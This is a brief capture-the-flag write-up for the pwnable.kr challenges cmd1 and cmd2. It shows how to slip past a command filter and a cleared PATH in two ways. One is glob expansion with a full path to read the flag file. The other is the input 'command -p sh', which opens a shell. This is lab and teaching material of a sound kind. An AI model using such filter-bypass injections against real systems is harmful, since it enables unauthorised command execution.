cmd challenges in Pwnable.kr
Jul 27, 2019
In this post we solve a few easy challenges on pwnable.kr called cmd1
and cmd2
cmd1 and cmd2
These two challenges required us to circumvent a cleared PATH
environment variable.
cmd1
In the first challenge, the program has a small filter, that doesn’t include /
Omitting this filter is rather easy with sh’s *
expansion and a full path to the executeable we wish to utilize.
./cmd1 "/bin/cat /home/cmd1/fl*"
cmd2
In the second challenge, the program has a larger filter, and clears all environment variables.
This makes us unable to use the solution from the first challenge, as it includes /
for the program name.
However, sh has a built-in, called command
, see the bash man page, this takes a parameter -p
which uses a default setting for the PATH
variable. Now we can execute ./cmd2 "command -p sh"
and pop a shell, from here we can cat
the flag.